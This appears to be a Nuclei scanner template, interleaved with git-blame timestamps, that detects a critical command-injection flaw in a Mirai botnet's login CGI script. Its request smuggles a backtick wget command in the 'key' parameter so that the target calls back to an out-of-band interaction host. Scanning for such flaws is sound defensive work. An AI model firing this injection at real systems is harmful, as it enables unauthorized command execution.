2021-07-18 13:44:29 +00:00
id : mirai-unknown-rce
info :
2022-05-30 14:04:12 +00:00
name : Mirai - Remote Command Injection
2021-07-18 13:44:29 +00:00
author : gy741
severity : critical
2022-05-31 08:53:16 +00:00
description : |
Mirai is susceptible to an unknown exploit that targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2021-07-18 13:44:29 +00:00
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
2022-05-30 14:04:12 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-05-30 14:04:12 +00:00
cwe-id : CWE-77
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-10-14 11:27:55 +00:00
tags : mirai,rce,oast
2021-07-18 13:44:29 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-18 13:44:29 +00:00
- raw :
- |
POST /cgi-bin/login.cgi HTTP/1.1
2021-09-30 16:52:05 +00:00
Host : {{Hostname}}
2021-07-18 13:44:29 +00:00
Content-Type : application/x-www-form-urlencoded
key=';`wget http://{{interactsh-url}}`;#
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"
2023-10-20 11:41:13 +00:00
# digest: 4a0a00473045022062d724e3f1b331b4295e1dcd33f8886110d415f1202ad611c79b083439f82c66022100d989e0b21234bcd97de86d3f2b9af48a6763e672816e2dc0c3ee032acae2da14:922c64590222798bb761d5b6d8e72950